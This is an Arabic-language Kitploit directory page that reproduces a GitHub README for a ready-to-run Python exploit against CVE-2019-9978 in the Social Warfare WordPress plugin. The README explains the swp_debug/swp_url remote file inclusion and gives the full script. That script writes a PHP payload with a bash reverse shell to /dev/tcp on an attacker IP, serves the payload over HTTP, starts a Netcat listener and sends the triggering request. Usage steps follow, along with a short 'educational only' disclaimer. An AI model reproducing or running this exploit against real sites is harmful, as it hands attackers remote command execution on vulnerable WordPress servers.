Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE — تسمح معلمة `swp_debug` في `admin-post.php` للمهاجمين عن بُعد بتضمين ملفات خارجية تحتوي على كود PHP خبيث، يتم تقييمه على الخادم. من خلال توفير عنوان URL مخصص يستضيف حمولة قشرة عكسية (reverse shell)، يمكن للمهاجم الحصول على تنفيذ أوامر. | Kitploit
أدوات/GitHubGitHub/housma/cve-2019-9978-social-warfare-wordpress-plugin-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
GitHub
housma/cve-2019-9978-social-warfare-wordpress-plugin-rce

CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE

تسمح معلمة `swp_debug` في `admin-post.php` للمهاجمين عن بُعد بتضمين ملفات خارجية تحتوي على كود PHP خبيث، يتم تقييمه على الخادم. من خلال توفير عنوان URL مخصص يستضيف حمولة قشرة عكسية (reverse shell)، يمكن للمهاجم الحصول على تنفيذ أوامر.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

CVE-2019-9978 - تنفيذ الأكواد عن بُعد (RCE) في إضافة Social Warfare لـ WordPress

يحتوي هذا المستودع على استغلال Python عملي لـ CVE-2019-9978، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في إضافة Social Warfare لـ WordPress (الإصدار <= 3.5.2).

الوصف

تسمح المعلمة swp_debug في admin-post.php للمهاجمين عن بُعد بتضمين ملفات خارجية تحتوي على كود PHP خبيث، يتم تقييمه على الخادم. من خلال توفير عنوان URL مخصص يستضيف حمولة قشرة عكسية (reverse shell)، يمكن للمهاجم الحصول على تنفيذ الأوامر.

ميزات الاستغلال

  • يستضيف حمولة PHP باستخدام خادم HTTP المدمج في Python.
  • يرسل معلمة swp_url خبيثة لتفعيل RCE.
  • يشغّل مستمع Netcat لالتقاط القشرة العكسية.
  • يكتب الحمولة تلقائيًا مع الإفلات الصحيح لضمان تنفيذ الأكواد بنجاح.

المتطلبات

  • Python 3.x
  • Netcat
  • إمكانية تحليل DNS المحلي للنطاق الهدف (على سبيل المثال، ربط بعنوان IP الهدف).
example.com

كود الاستغلال

root@kitploit:~
#!/usr/bin/env python3

import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time

# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130"  # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4447
PAYLOAD_FILE = "payload.txt"

def create_payload():
    """Write exact reverse shell payload using valid PHP syntax"""
    payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
    with open(PAYLOAD_FILE, "w") as f:
        f.write(payload)
    print(f"[+] Payload written to {PAYLOAD_FILE}")

def start_http_server():
    """Serve payload over HTTP"""
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
        print(f"[+] HTTP server running at port {HTTP_PORT}")
        httpd.serve_forever()

def start_listener():
    """Start Netcat listener"""
    print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
    subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])

def send_exploit():
    """Trigger the exploit with vulnerable parameter"""
    payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
    exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
    print(f"[+] Sending exploit: {exploit}")
    try:
        requests.get(exploit, timeout=5)
    except requests.exceptions.RequestException:
        pass

def main():
    create_payload()

    # Start web server in background
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    time.sleep(2)  # Give server time to start

    # Start listener in background
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
    time.sleep(1)

    # Send the malicious request
    send_exploit()

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[-] Interrupted by user.")

الاستخدام

  1. قم بتحديث ATTACKER_IP و LISTEN_PORT إلى عنوان IP الخاص بجهازك والمنفذ المطلوب.
  2. تأكد من أن النطاق الهدف يحل example.com إلى عنوان IP الصحيح.
  3. قم بتشغيل السكربت:
root@kitploit:~
python3 exploit.py
  1. التقط القشرة العكسية من خلال المستمع الخاص بك.

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2019-9978
  • https://github.com/hash3liZer/CVE-2019-9978

إخلاء مسؤولية

هذا الاستغلال مقدم لأغراض تعليمية فقط. لا تستخدمه دون إذن صريح على أي نظام لا تملكه.

تنزيل الأداة